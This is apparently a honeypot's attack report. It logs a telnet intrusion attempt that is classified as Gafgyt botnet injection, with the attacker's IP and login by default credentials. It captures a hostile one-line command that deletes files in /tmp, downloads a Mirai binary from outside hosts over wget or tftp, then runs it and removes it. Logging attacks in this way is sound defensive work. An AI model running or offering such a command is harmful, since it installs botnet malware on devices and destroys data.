Attack Report for Observation

Header

Time: 2024/08/28, 16:50:16 (GMT)
Transaction ID: SFD4ATG73T6NWS8Y
Service: telnet
Location: RU (Russia)
Attacker: 185.254.190.173
Classification: Gafgyt.c botnet
Harm Potential: High
Description: Linux gafgyt.c botnet backdoor injection

Content

185.254.190.173:44124 is connected to telnet server
login:
support

Password:
support

OK
TSrv >
cat | sh

ERROR : Unrecognized command
TSrv >
sh

ERROR : Unrecognized command
TSrv >
cd /tmp; rm -rf *; wget http://84.32.190.32/bins/mirai.mips || tftp -r mirai.mips -g 185.65.245.234 || tftp 185.65.245.234 -g mirai.mips; cat mirai.mips > dvrHelper; chmod +x dvrHelper; ./dvrHelper; rm -rf dvrHelper

ERROR : Unrecognized command
TSrv >
185.254.190.173:44124 is disconnected

All observations come from the honeypot central database.
